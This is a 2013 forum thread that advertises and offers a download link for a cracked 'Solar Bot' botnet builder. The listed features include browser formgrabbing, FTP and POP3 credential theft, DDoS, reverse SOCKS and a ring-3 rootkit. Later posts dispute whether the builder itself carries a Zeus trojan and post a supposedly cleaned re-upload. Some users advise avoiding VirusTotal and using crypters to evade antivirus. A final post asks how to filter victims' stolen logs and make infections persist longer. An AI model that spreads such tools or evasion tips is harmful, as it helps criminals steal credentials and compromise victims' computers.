criss84 Posted November 2, 2013 (edited)

Technical Details
Coded in Lazarus (Pascal)
Code is fully relocatable (Shellcode)
Uses custom CRC32 API loader
Uses BeaEngine Disassembler for x86 and x64
Uses named pipes for inter-process communication
Multiple layers of encryption and compression
Global Ring 3 rootkit and No own process
Fully Unicode
No dependencies (Only standard system DLLs)
Multiple Anti-Debug methods
Unique Server->Bot traffic encryption
Anti bot installation

Features
Internet Explorer Formgrabber
Mozilla Firefox Formgrabber
Google Chrome Formgrabber
SPDY Grabbing
FTP and POP3 Grabber
SlowLoris DDOS and SlowPost DDOS
GET Flood
UDP DDOS
Update and Download System
MD5 Verified Update and Download System
Reverse Socks 5
Browse URL (Visible)
Browse URL (Hidden)

Download: Solar Bot Builder.zip from Sendspace.com

Edited November 2, 2013 by criss84

bahaosistu Posted November 2, 2013

What exactly does this program do?

bahaosistu Posted November 2, 2013

I think I get it... you install it on a site, and whoever visits it gets a keylogger or something like that.

bahaosistu Posted November 6, 2013

I don't understand what's with those logs... I can't make anything of them... not a single password...

Wav3 Posted November 6, 2013

That guy worked on it, and you post it here cracked?

Brenin Posted November 6, 2013

Wav3, the people who use cracked builders, or ones like the one in this thread, are people who would never have been the author's customers anyway. Take a look at the 4 posts above yours, you'd think they came from the gypsy quarter.

SpyEye also appeared cracked in lots of ways, but that didn't stop gribodemon from having 8700 customers.

AlMalalah Posted November 6, 2013

> Wav3, the people who use cracked builders, or ones like the one in this thread, are people who would never have been the author's customers anyway. Take a look at the 4 posts above yours, you'd think they came from the gypsy quarter.
> SpyEye also appeared cracked in lots of ways, but that didn't stop gribodemon from having 8700 customers.

How come this gribodemon hasn't been caught and locked up, since supposedly it's illegal to program and sell such programs too, not only to use them?

Brenin Posted November 6, 2013

They didn't catch him because he's smart, he knows how to hide, and another big plus is that he is from / lives in Russia, or at least that's what is believed, which gives him a huge advantage.

If you've noticed, in his threads and those of other authors like him, they state very, very clearly that they don't agree with this type of malware being used in the CIS zones, as they call them, or rather in the independent states, one of them being Russia. As a result, the Russian authorities ignore him, or at least leave him free, and the international ones can't touch him.

That doesn't mean he's some kind of Darwin of the Russians; he simply respects his own people.

As an aside, it was suspected that gribodemon is the same person as Monstr / Slavik, the author of the Zeus bot, but nobody has proven that. Anyway, that one is still free too, with the latest sums made from selling it estimated at somewhere around 40 million $.

itwell Posted November 26, 2013

the builder is infected
https://www.virustotal.com/en/file/2d3ef6e066a7563b91c2944f81392b719fbfab040a83b8b89623140d492c1a0f/analysis/1385477500/
Detection ratio: 30 / 46
Mentioned Trojan.Zbot = Zeus botnet

this line infected
http://img546.imageshack.us/img546/2659/slel.png

delete routes and have a valid report
remove lines and verified to work correctly
the builder and clean.
http://img818.imageshack.us/img818/921/dst2.png
https://www.virustotal.com/en/file/a37b6296c7f151cd95bc5383812bbcbf97783e7511b996ca635fae92800aade8/analysis/1385478715/
Detection ratio: 12 / 46

https://anonfiles.com/file/d834686b6cffaa34407d184ee6dac51e

criss84 (Author) Posted November 26, 2013

First, you must be banned for scanning on VirusTotal. Second, the builder is not infected with Zeus; these links only show your IP and don't do anything harmful on your PC:

http://ipv4.icanhazip.com
http://my.ip.dnsomatic.com
http://api.exip.org?call=ip
http://ip.comax.fr
http://ip1.dynupdate.no-ip.com
http://ifconfig.me/ip

Darkb0t Posted November 28, 2013

great tut, thanks
learning, post more

Darkb0t Posted November 28, 2013

> First, you must be banned for scanning on VirusTotal. Second, the builder is not infected with Zeus; these links only show your IP and don't do anything harmful on your PC:
> http://ipv4.icanhazip.com
> http://my.ip.dnsomatic.com
> http://api.exip.org?call=ip
> http://ip.comax.fr
> http://ip1.dynupdate.no-ip.com
> http://ifconfig.me/ip

and indeed, should be banned, never use VirusTotal, using private scanner
they send reports to companies Antivirus, concertaza new updates for Antivirus in relation to the solar botnet builder
having to use a good crypter for camouflage

itwell Posted November 28, 2013

well first check where it connects,
http://ipv4.icanhazip.com !
Detailed Analysis - Troj/Agent-ADRF - Viruses and Spyware - Threat Analysis - Threat Center - Sophos

Darkb0t Posted December 15, 2013

software are infected,
features/update, look here: Solar Bot

bozzmann Posted February 13, 2014

I really like this solar bot! Because it infects all browsers. But the problem I have with this bot is that it sends too many rubbish and nonsense logs to the logs database, more than it sends useful logs containing victim's inputs.

Please, who knows how I can set this bot to send only good and useful logs to the logs database?

And after the victim is infected, this bot dies in the victim's computer and stops sending logs after about just 40 minutes of infection.

Please, how can I make this bot live much longer in the victim's computer?